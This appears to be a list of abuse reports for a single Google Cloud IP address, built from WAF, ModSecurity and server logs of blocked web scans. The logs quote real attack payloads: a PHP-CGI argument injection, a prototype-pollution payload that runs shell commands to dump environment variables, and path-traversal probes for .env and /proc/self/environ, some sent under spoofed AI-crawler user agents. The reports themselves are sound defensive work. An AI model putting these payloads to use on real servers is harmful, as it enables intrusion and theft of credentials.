πͺπΈ
el-brujo
2026-10-09 09:39:03
(1 day ago)
Cloudflare WAF: Request Path: /cgi-bin/php Request Query: ?%ADd+allow_url_include%3d1+%ADd+auto_prep ...
show more
Cloudflare WAF: Request Path: /cgi-bin/php Request Query: ?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input Host: metrics.elhacker.net userAgent: Mozilla/5.0 (compatible; DeepSeekBot/1.0; +https://www.deepseek.com/) Action: block Source: firewallCustom ASN Description: Google LLC Country: CA Method: POST Timestamp: 2026-10-09T09:39:03Z ruleId: 6b2d48d0415e4adb9f099d85f54d1de6. Report generated by Cloudflare-WAF-to-AbuseIPDB.
show less
Hacking
SQL Injection
Web App Attack
π«π·
PacketFilter
2026-10-09 09:02:48
(1 day ago)
Fail2Ban
Hacking
Web App Attack
π©πͺ
Marco711
2026-10-09 09:00:38
(1 day ago)
port/URL scanning
Port Scan
Web App Attack
πͺπΈ
el-brujo
2026-10-09 08:54:04
(1 day ago)
09/Oct/2026:10:54:04.074308 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
09/Oct/2026:10:54:04.074308 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 35.203.25.153] ModSecurity: Warning. Matched phrase "proc/self/environ" at ARGS:0. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "98"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: proc/self/environ found within ARGS:0: {\\\\x22then\\\\x22:\\\\x22$1:__proto__:then\\\\x22,\\\\x22status\\\\x22:\\\\x22resolved_model\\\\x22,\\\\x22reason\\\\x22:-1,\\\\x22value\\\\x22:\\\\x22{/\\\\x22then/\\\\x22:/\\\\x22$b1337/\\\\x22}\\\\x22,\\\\x22_response\\\\x22:{\\\\x22_prefix\\\\x22:\\\\x22process.mainmodule.require('child_process').execsync('env 2>/dev/null || cat /proc/self/environ 2>/dev/null');\\\\x22,\\\\x22_formdata\\\\x22:{\\\\x22get\\\\x22:\\\\x22$1:constructor:constructor\\\\x22}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "
...
show less
Hacking
Web App Attack
πΊπΈ
TPI-Abuse
2026-10-09 08:51:53
(1 day ago)
(mod_security) mod_security (id:210492) triggered by 35.203.25.153 (153.25.203.35.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210492) triggered by 35.203.25.153 (153.25.203.35.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Oct 09 04:51:49.241109 2026] [security2:error] [pid 21028:tid 21028] [client 35.203.25.153:55066] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "mail.buyperfumeonline.net"] [uri "/appearance/../../.env"] [unique_id "asirJYYWVM50XG4Fyjf-mgAAAA0"]
show less
Brute-Force
Bad Web Bot
Web App Attack
πΊπΈ
Charlesiv
2026-10-09 06:00:46
(1 day ago)
Triggered Cloudflare WAF (firewallCustom) from CA.
Action taken: BLOCK
ASN: 396982 (Google LLC)
Prot ...
show more
Triggered Cloudflare WAF (firewallCustom) from CA.
Action taken: BLOCK
ASN: 396982 (Google LLC)
Protocol: HTTP/2 (POST method)
Endpoint: /exec-py
Timestamp: 2026-10-09T05:48:44Z
Ray ID: a47b19174efe3896
UA: Mozilla/5.0 (compatible; YiBot/1.0; +https://01.ai/)
show less
Bad Web Bot
π©πͺ
itsolon
2026-10-09 05:51:59
(1 day ago)
[09/Oct/2026:07:51:57 +0200] 179152511756.718234 35.203.25.153 0 217.154.7.177 443
[09/Oct/2026:07:5 ...
show more
[09/Oct/2026:07:51:57 +0200] 179152511756.718234 35.203.25.153 0 217.154.7.177 443
[09/Oct/2026:07:51:57 +0200] 179152511774.437657 35.203.25.153 0 217.154.7.177 443
[09/Oct/2026:07:51:57 +0200] 179152511727.880609 35.203.25.153 0 217.154.7.177 443
[09/Oct/2026:07:51:57 +0200] 179152511719.979144 35.203.25.153 0 217.154.7.177 443
[09/Oct/2026:07:51:58 +0200] 179152511885.632599 35.203.25.153 0 217.154.7.177 443
...
show less
Port Scan
Hacking
Brute-Force
Web App Attack
π«π·
β¨
2026-10-09 01:53:12
(1 day ago)
Domain : demo.famlive.net
Rule : env
2026-10-09 01:51:52 W3SVC215 PLESK76 217.194.212.5 GET /media.. ...
show more
Domain : demo.famlive.net
Rule : env
2026-10-09 01:51:52 W3SVC215 PLESK76 217.194.212.5 GET /media../.env - 80 - 35.203.25.153 HTTP/1.1 Mozilla/5.0 (compatible; Google-Extended; http://www.google.com/bot.html) - - demo.famlive.net 404 0 2 1527 382 78 - -
show less
Hacking
SQL Injection
π«π·
regishoussin
2026-10-09 01:51:35
(1 day ago)
Automated web scanning detected by Wazuh (rule 100240): repeated 400/404 errors from mass probing of ...
show more
Automated web scanning detected by Wazuh (rule 100240): repeated 400/404 errors from mass probing of admin/backdoor paths (e.g. wp-login.php, known CMS shell filenames) on an Apache web server, on 2026-10-09 01:51 UTC.
show less
Bad Web Bot
Web App Attack
πΊπΈ
crooze.net
2026-10-09 01:12:37
(1 day ago)
35.203.25.153 - - [08/Oct/2026:21:12:36 -0400] "GET /config.js HTTP/2.0" 403 107 "-" "Mozilla/5.0 (c ...
show more
35.203.25.153 - - [08/Oct/2026:21:12:36 -0400] "GET /config.js HTTP/2.0" 403 107 "-" "Mozilla/5.0 (compatible; Google-Extended; +http://www.google.com/bot.html)"
...
show less
Web App Attack
π©πͺ
itsolon
2026-10-08 23:33:49
(1 day ago)
[09/Oct/2026:01:33:48 +0200] 179150242845.608793 35.203.25.153 48432 217.154.7.177 443
[09/Oct/2026: ...
show more
[09/Oct/2026:01:33:48 +0200] 179150242845.608793 35.203.25.153 48432 217.154.7.177 443
[09/Oct/2026:01:33:48 +0200] 179150242823.328463 35.203.25.153 48432 217.154.7.177 443
[09/Oct/2026:01:33:49 +0200] 179150242963.300808 35.203.25.153 48432 217.154.7.177 443
[09/Oct/2026:01:33:49 +0200] 179150242995.122987 35.203.25.153 48432 217.154.7.177 443
[09/Oct/2026:01:33:49 +0200] 179150242956.092612 35.203.25.153 48432 217.154.7.177 443
...
show less
Port Scan
Hacking
Brute-Force
Web App Attack
π§π·
radardatelecom
2026-10-08 22:27:14
(1 day ago)
Blocked by Radar da Telecom firewall β abuseipdb
Bad Web Bot
Web App Attack
πΊπΈ
TPI-Abuse
2026-10-08 21:57:08
(1 day ago)
(mod_security) mod_security (id:210580) triggered by 35.203.25.153 (153.25.203.35.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210580) triggered by 35.203.25.153 (153.25.203.35.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Oct 08 17:57:01.911181 2026] [security2:error] [pid 32516:tid 32516] [client 35.203.25.153:50524] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "proc/self/environ" at ARGS:filename. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||brooklyntrademarklawyers.karenbernsteinlaw.net|F|2"] [data "Matched Data: proc/self/environ found within ARGS:filename: file:/proc/self/environ"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "brooklyntrademarklawyers.karenbernsteinlaw.net"] [uri "/__vite_rsc_findSourceMapURL"] [unique_id "asgRreWKFuw_R6suJNuWAQAAAA8"]
show less
Brute-Force
Bad Web Bot
Web App Attack
π©πͺ
datajt
2026-10-08 21:53:56
(1 day ago)
Web vulnerability probing (CrowdSec scenario crowdsecurity/http-sensitive-files).
Web App Attack
π¬π§
stevendodd
2026-10-08 21:35:46
(1 day ago)
35.203.25.153 - - [08/Oct/2026:22:35:44 +0100] "GET /config.json HTTP/1.1" 404 414 "-" "Mozilla/5.0 ...
show more
35.203.25.153 - - [08/Oct/2026:22:35:44 +0100] "GET /config.json HTTP/1.1" 404 414 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Claude-SearchBot/1.0; [email protected] )"
35.203.25.153 - - [08/Oct/2026:22:35:44 +0100] "GET /app-config.json HTTP/1.1" 404 414 "-" "Mozilla/5.0 (compatible; DeepSeekBot/1.0; +https://www.deepseek.com/)"
35.203.25.153 - - [08/Oct/2026:22:35:44 +0100] "GET /config.json.js HTTP/1.1" 404 414 "-" "Mozilla/5.0 (compatible; YiBot/1.0; +https://01.ai/)"
35.203.25.153 - - [08/Oct/2026:22:35:44 +0100] "GET /static../.env HTTP/1.1" 404 414 "-" "Mozilla/5.0 (compatible; xAI-Grok/1.0; +https://x.ai/)"
35.203.25.153 - - [08/Oct/2026:22:35:44 +0100] "GET /media../.env HTTP/1.1" 404 414 "-" "Mozilla/5.0 (compatible; Meta-ExternalAgent/1.0; +https://developers.facebook.com/docs/sharing/webmasters/crawler)"
35.203.25.153 - - [08/Oct/2026:22:35:45 +0100] "GET /files../.env HTTP/1.1" 404 414 "-" "Mozilla/5.0 (compatible; ChatGLM-Spider/1.0; +https:
...
show less
Brute-Force
Web App Attack